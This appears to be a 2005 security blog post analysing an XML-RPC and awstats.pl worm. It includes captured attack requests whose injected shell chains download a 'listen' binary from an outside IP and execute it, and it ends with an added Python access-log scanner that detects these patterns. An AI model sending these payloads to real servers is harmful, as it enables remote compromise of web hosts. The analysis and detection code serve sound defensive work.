On the XML-RPC Worm

A few days ago we had an advisory on XML-RPC malware attacking our smallpot nodes. The first sample we detect as HKTL_CALLBACK.A, and the other as HKTL_CALLBACK.B. HKTL_CALLBACK.B is being re-verified, since there are reports that it is a worm and not a “hack tool”.

Anyway, right now we are again receiving a round of attacks of the same kind as the previous XML-RPC ones.
We are currently acquiring the sample (I say ‘currently acquiring’ since some of the sources are dead) and we will post updates later (of course!).

For added reading, check out this link (which pretty much says it all):
ISC


Update (JJ, 08 November 2005 22:09:45)

HKTL_CALLBACK.B will now be detected as ELF_LUPPER.A


Update (JJ, 08 November 2005 22:19:44)

Now we are (again) seeing pretty much the same thing as ISC:

  • exploits awstats.pl vulnerability
  • exploits xmlrpc.php

From ISC:
“You can find the details of the vulnerability at:
http://www.gulftech.org/?node=research&article_id=00088-07022005
http://www.securityfocus.com/bid/14088/
http://secunia.com/advisories/15852/

For a list of vulnerable applications, please refer to:
http://www.securityfocus.com/bid/14088/info
http://www.osvdb.org/17793

If you are running a vulnerable version, you are advised to upgrade immediately:
http://www.securityfocus.com/bid/14088/solution”

However, for the xmlrpc.php attack, instead of downloading the file ‘cback’ or ‘lupii’, it now downloads a file named ‘listen’. Based on initial analysis, it seems to combine the functionality of both ‘cback’ and ‘lupii’:


  • it can be run with an argument, which, IMO, acts as a connect-back program for the attacker (same as cback – HKTL_CALLBACK.A)
  • it also has worm capabilities to propagate via awstats.pl or xml-rpc exploits (same as lupii – ELF_LUPPER.A)


Possible ELF_LUPPER.B?


Update (JJ, 08 November 2005 22:42:16)

So far we’ve seen the following attacks:

POST requests to the following URLs:


  • /xmlrpc/xmlrpc.php
  • /wordpress/xmlrpc.php
  • /phpgroupware/xmlrpc.php
  • /drupal/xmlrpc.php
  • /blogs/xmlsrv/xmlrpc.php
  • /blog/xmlsrv/xmlrpc.php
  • /blog/xmlrpc.php

This, of course, attempts to exploit the XML-RPC vulnerability.

It also sends a GET request to exploit the awstats.pl configdir vulnerability, targeting the following URLs:


  • /cgi-bin/
  • /cgi-bin/awstats/
  • /awstats/

The malware appends the exploit code to each of these directory paths. Sample captures of the two attacks are as follows:

XML-RPC
==============================
POST /xmlrpc.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length:269


test.method
',''));
echo '_begin_';echo `cd /tmp;wget 24.xxx.xxx.18/listen;chmod +x listen;./listen `;
echo '_end_';exit;/*

==============================



AWSTATS.PL
==============================
GET /awstats/awstats.pl?configdir=|echo;
echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3b
chmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;
echo| HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
==============================
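The two captures above leave a recognisable trace in ordinary web server access logs: a POST to one of the listed xmlrpc.php paths, and a GET to awstats.pl whose configdir value opens with a pipe and carries a download-and-run chain. The following is an added example written for this post, not code from the original or from any vendor tool; it scans common-log-format lines for both patterns. The log lines, the 203.0.113.x / 192.0.2.x / 198.51.100.x addresses and the timestamps are constructed for illustration.

```python
import re
from urllib.parse import unquote

# XML-RPC paths listed in the post as POST targets, plus the bare /xmlrpc.php from the capture
XMLRPC_PATHS = {
    "/xmlrpc.php", "/xmlrpc/xmlrpc.php", "/wordpress/xmlrpc.php",
    "/phpgroupware/xmlrpc.php", "/drupal/xmlrpc.php",
    "/blogs/xmlsrv/xmlrpc.php", "/blog/xmlsrv/xmlrpc.php", "/blog/xmlrpc.php",
}
# Common log format: client ident user [time] "METHOD TARGET PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
# Download-and-execute fragments seen in the captured payloads (wget, chmod +x, cd /tmp)
SHELL_RE = re.compile(r"\b(wget|curl|chmod)\b|/tmp")


def classify(line):
    """Return a finding string for a suspicious access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    path, _, query = target.partition("?")
    # Access logs do not record POST bodies (where the PHP injection lives), so every POST to a
    # listed XML-RPC endpoint is flagged for follow-up; GETs to the same path are not.
    if method == "POST" and path in XMLRPC_PATHS:
        return f"{client}: POST to XML-RPC endpoint {path} (status {status})"
    # awstats.pl: configdir is only an injection when its decoded value opens with '|';
    # a normal config=/output= query is left alone.
    if path.endswith("awstats.pl"):
        params = dict(p.split("=", 1) for p in unquote(query).split("&") if "=" in p)
        cfg = params.get("configdir", "")
        if cfg.startswith("|"):
            kind = "download-and-run" if SHELL_RE.search(cfg) else "unclassified"
            return f"{client}: awstats.pl configdir injection ({kind} payload, status {status})"
    return None


def scan(lines):
    """Apply classify() to every line and keep only the findings, in log order."""
    return [f for f in map(classify, lines) if f]


# Constructed sample log; the third and fourth lines are benign controls.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Nov/2005:22:30:01 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [08/Nov/2005:22:30:02 +0000] "GET /awstats/awstats.pl?configdir=|echo;'
    'echo%20YYY;cd%20%2ftmp%3bwget%20198.51.100.7%2flisten%3bchmod%20%2bx%20listen%3b'
    '%2e%2flisten;echo%20YYY;echo| HTTP/1.1" 200 1024',
    '192.0.2.9 - - [08/Nov/2005:22:31:00 +0000] "GET /awstats/awstats.pl?config=site&output=main HTTP/1.1" 200 4096',
    '192.0.2.9 - - [08/Nov/2005:22:31:05 +0000] "GET /blog/xmlrpc.php HTTP/1.1" 200 42',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the XML-RPC injection sits in the POST body, a hit on the first pattern only tells you where to look; confirming it needs the body from a proxy log, IDS capture or the honeypot itself.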